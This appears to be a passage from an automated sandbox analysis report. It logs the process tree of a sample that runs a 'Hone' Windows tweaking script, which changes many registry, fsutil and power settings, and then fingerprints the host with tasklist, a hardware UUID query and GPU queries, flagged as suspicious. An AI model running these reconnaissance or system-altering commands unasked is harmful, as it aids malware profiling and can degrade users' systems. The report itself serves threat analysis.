        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications" /v "GlobalUserDisabled" /t Reg_DWORD /d "1" /f
        6⤵
        
        PID:548
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows\AppPrivacy" /v "LetAppsRunInBackground" /t Reg_DWORD /d "2" /f
        6⤵
        
        PID:3500
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Search" /v "BackgroundAppGlobalToggle" /t Reg_DWORD /d "0" /f
        6⤵
        
        PID:2088
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePagingExecutive" /t Reg_DWORD /d "1" /f
        6⤵
        
        PID:3020
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -NoProfile -Command "Disable-MMAgent -PagingCombining -mc"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3156
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v "DisablePageCombining" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3688
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v "LargeSystemCache" /t Reg_DWORD /d "1" /f
        6⤵
        
        PID:4868
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control\Session Manager" /v "HeapDeCommitFreeBlockThreshold" /t REG_DWORD /d "262144" /f
        6⤵
        
        PID:3388
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3636
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "DontVerifyRandomDrivers" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3668
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\FileSystem" /v "LongPathsEnabled" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:2584
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t Reg_DWORD /d "0" /f
        6⤵
        
        PID:984
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnableSuperfetch" /t Reg_DWORD /d "0" /f
        6⤵
        
        PID:2700
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v "HiberbootEnabled" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:2336
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabledDefault" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:3984
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power" /v "HibernateEnabled" /t REG_DWORD /d "0" /f
        6⤵
        
        PID:2952
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v "WaitToKillAppTimeout" /t Reg_SZ /d "1000" /f
        6⤵
        
        PID:2140
      - C:\Windows\system32\reg.exe
        
        reg add "HKLM\System\CurrentControlSet\Control" /v "WaitToKillServiceTimeout" /t Reg_SZ /d "1000" /f
        6⤵
        
        PID:2224
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Desktop" /v "HungAppTimeout" /t Reg_SZ /d "1000" /f
        6⤵
        
        PID:576
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set memoryusage 2
        6⤵
        
        PID:3248
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set mftzone 2
        6⤵
        
        PID:1228
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set disablelastaccess 1
        6⤵
        
        PID:1920
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set encryptpagingfile 0
        6⤵
        
        PID:1440
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set disable8dot3 1
        6⤵
        
        PID:1644
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set disablecompression 1
        6⤵
        
        PID:3524
      - C:\Windows\system32\fsutil.exe
        
        fsutil behavior set disabledeletenotify 0
        6⤵
        
        PID:1544
      - C:\Windows\system32\cmd.exe
        
        cmd /V:ON /C @echo off
        6⤵
        
        PID:1432
      - C:\Windows\system32\mode.com
        
        Mode 65,16
        6⤵
        
        PID:4700
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:2656
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:5060
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2164
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:4020
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:4452
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4376
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4028
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:4380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:672
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:1936
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3004
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:1164
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2836
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:3412
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:824
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:2228
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:1396
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:2592
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:520
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:3440
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:1076
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:3344
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4796
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:4568
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:972
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:1200
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:1572
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:4852
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4444
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:3332
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:3920
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:4904
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:848
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:4988
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:1324
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:2096
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:3724
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:1176
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:2488
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:4644
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:1376
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:3392
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:2956
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:2716
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:1152
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:2380
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:940
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:1368
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:3756
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:3000
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:944
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:4844
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:1540
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:2936
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:1844
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:4472
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:548
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:5080
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_VideoController get VideoProcessor /value
        6⤵
        
        PID:3020
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_VideoController get VideoProcessor /value
        7⤵
        
        PID:3900
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3640
      - C:\Windows\system32\find.exe
        
        find "GeForce"
        6⤵
        
        PID:3840
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1828
      - C:\Windows\system32\find.exe
        
        find "NVIDIA"
        6⤵
        
        PID:1372
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1132
      - C:\Windows\system32\find.exe
        
        find "RTX"
        6⤵
        
        PID:4348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:1740
      - C:\Windows\system32\find.exe
        
        find "GTX"
        6⤵
        
        PID:3244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:4676
      - C:\Windows\system32\find.exe
        
        find "AMD"
        6⤵
        
        PID:712
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3380
      - C:\Windows\system32\find.exe
        
        find "Ryzen"
        6⤵
        
        PID:820
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:2984
      - C:\Windows\system32\find.exe
        
        find "Intel"
        6⤵
        
        PID:4636
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo SeaBIOS VBE(C) 2011 "
        6⤵
        
        PID:3168
      - C:\Windows\system32\find.exe
        
        find "UHD"
        6⤵
        
        PID:1168
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Mouse" /v "MouseSpeed" /t REG_SZ /d "0" /f
        6⤵
        
        PID:3012
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold1" /t REG_SZ /d "0" /f
        6⤵
        
        PID:3040
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Mouse" /v "MouseThreshold2" /t REG_SZ /d "0" /f
        6⤵
        
        PID:4220
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Mouse" /v "MouseSensitivity" /t REG_SZ /d "10" /f
        6⤵
        
        PID:4248
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve" /t REG_BINARY /d "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000" /f
        6⤵
        
        PID:476
      - C:\Windows\system32\control.exe
        
        control.exe desk.cpl,Settings,@Settings
        6⤵
        
        PID:560
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL desk.cpl,Settings,@Settings
        7⤵
        Checks computer location settings
        
        PID:3524
        
        C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe" ms-settings:display
        8⤵
        
        PID:2648
      - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Control Panel\Mouse" /v "SmoothMouseXCurve" /t REG_BINARY /d "0000000000000000C0CC0C0000000000809919000000000040662600000000000033330000000000" /f
        6⤵
        
        PID:2768
      - C:\Windows\system32\cmd.exe
        
        cmd /V:ON /C @echo off
        6⤵
        
        PID:1824
      - C:\Windows\system32\mode.com
        
        Mode 65,16
        6⤵
        
        PID:3332
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:524
      - C:\Windows\system32\mode.com
        
        Mode 130,45
        6⤵
        
        PID:4024
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path win32_VideoController get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:3180
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get PNPDeviceID
        7⤵
        
        PID:4064
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:3300
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:240
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1376
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&11583659&0&08\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:2888
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic path Win32_NetworkAdapter get PNPDeviceID | findstr /L "VEN_"
        6⤵
        
        PID:2108
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_NetworkAdapter get PNPDeviceID
        7⤵
        
        PID:3408
        
        C:\Windows\system32\findstr.exe
        
        findstr /L "VEN_"
        7⤵
        
        PID:1152
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\MessageSignaledInterruptProperties" /v "MSISupported"
        6⤵
        
        PID:4632
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:1368
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Enum\PCI\VEN_10EC&DEV_8139&SUBSYS_11001AF4&REV_20\3&11583659&0&18\Device Parameters\Interrupt Management\Affinity Policy" /v "DevicePriority"
        6⤵
        
        PID:3756
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic os get TotalVisibleMemorySize /value
        6⤵
        
        PID:2432
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get TotalVisibleMemorySize /value
        7⤵
        
        PID:944
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        6⤵
        
        PID:2972
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Control" /v "SvcHostSplitThresholdInKB"
        7⤵
        
        PID:1844
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NVTTweaks"
        6⤵
        
        PID:4472
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA" | findstr "HKEY"
        6⤵
        
        PID:4532
        
        C:\Windows\system32\reg.exe
        
        reg query "HKLM\System\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}" /t REG_SZ /s /e /f "NVIDIA"
        7⤵
        
        PID:1196
        
        C:\Windows\system32\findstr.exe
        
        findstr "HKEY"
        7⤵
        
        PID:548
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemption"
        6⤵
        
        PID:2708
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:3924
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableCudaContextPreemption"
        6⤵
        
        PID:872
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:2988
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "EnableCEPreemption"
        6⤵
        
        PID:4860
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:4312
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisablePreemptionOnS3S4"
        6⤵
        
        PID:1816
      - C:\Windows\system32\find.exe
        
        find "0x1"
        6⤵
        
        PID:4332
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "ComputePreemption"
        6⤵
        
        PID:3964
      - C:\Windows\system32\find.exe
        
        find "0x0"
        6⤵
        
        PID:816
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v CpuPriorityClass
        6⤵
        
        PID:544
      - C:\Windows\system32\find.exe
        
        find "0x4"
        6⤵
        
        PID:4460
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\csrss.exe\PerfOptions" /v IoPriority
        6⤵
        
        PID:3196
      - C:\Windows\system32\find.exe
        
        find "0x3"
        6⤵
        
        PID:992
      - C:\Windows\system32\powercfg.exe
        
        powercfg /GetActiveScheme
        6⤵
        Power Settings
        
        PID:116
      - C:\Windows\system32\find.exe
        
        find "Hone"
        6⤵
        
        PID:1388
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AllGPUTweaks"
        6⤵
        
        PID:4228
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NpiTweaks"
        6⤵
        
        PID:2952
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "TCPIP"
        6⤵
        
        PID:2860
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "NvidiaTweaks"
        6⤵
        
        PID:2224
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MemoryTweaks"
        6⤵
        
        PID:4724
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "InternetTweaks"
        6⤵
        
        PID:2624
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "ServicesTweaks"
        6⤵
        
        PID:3248
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "DebloatTweaks"
        6⤵
        
        PID:2328
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "MitigationsTweaks"
        6⤵
        
        PID:1644
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Software\Hone" /v "AffinityTweaks"
        6⤵
        
        PID:460
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\nvlddmkm" /v "DisableWriteCombining"
        6⤵
        
        PID:4708
      - C:\Windows\system32\reg.exe
        
        reg query "HKCU\Control Panel\Mouse" /v "SmoothMouseYCurve"
        6⤵
        
        PID:1544
      - C:\Windows\system32\find.exe
        
        find "0000000000000000000038000000000000007000000000000000A800000000000000E00000000000"
        6⤵
        
        PID:2344
      - C:\Windows\system32\reg.exe
        
        reg query "HKLM\SOFTWARE\Intel\GMM" /v "DedicatedSegmentSize"
        6⤵
        
        PID:1656
      - C:\Windows\system32\find.exe
        
        find "0x400"
        6⤵
        
        PID:3560
      - C:\Windows\system32\sc.exe
        
        sc query STR
        6⤵
        Launches sc.exe
        
        PID:4244
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:1204
      - C:\Windows\system32\sc.exe
        
        sc query HoneAudio
        6⤵
        Launches sc.exe
        
        PID:4828
      - C:\Windows\system32\find.exe
        
        find "RUNNING"
        6⤵
        
        PID:4540
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_Battery Get BatteryStatus
        6⤵
        
        PID:772
      - C:\Windows\system32\find.exe
        
        find "1"
        6⤵
        
        PID:1272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1780
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:4248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4412
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:4692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:636
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2560
- - C:\Windows\system32\cmd.exe
